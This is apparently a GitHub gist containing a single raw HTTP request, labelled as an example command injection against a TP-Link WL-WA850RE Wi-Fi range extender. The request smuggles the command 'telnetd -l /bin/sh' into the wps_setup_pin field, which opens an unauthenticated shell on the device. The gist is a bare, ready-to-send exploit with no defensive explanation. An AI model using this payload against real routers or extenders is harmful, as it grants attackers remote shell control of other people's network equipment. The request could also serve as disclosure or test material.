Skip to content

Instantly share code, notes, and snippets.

@eacmen
Last active February 19, 2019 19:44
Show Gist options
  • Save eacmen/1ff808f5f1c3cc68cfb89d1078e772b0 to your computer and use it in GitHub Desktop.
Save eacmen/1ff808f5f1c3cc68cfb89d1078e772b0 to your computer and use it in GitHub Desktop.
TP-LINK WL-WA850RE Example Command Injection HTTP Request
POST /data/wps.setup.json HTTP/1.1
Origin: http://192.168.0.254
Content-Length: 100
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Connection: close
Accept: application/json, text/javascript, /; q=0.01
User-Agent: Mozilla/5.0
Host: 192.168.0.254
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.254/
Cookie: COOKIE=456787465784
Content-Type: application/x-www-form-urlencoded; charset=UTF–8
operation=write&option=connect&wps_setup_pin=12345670;telnetd -l /bin/sh
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment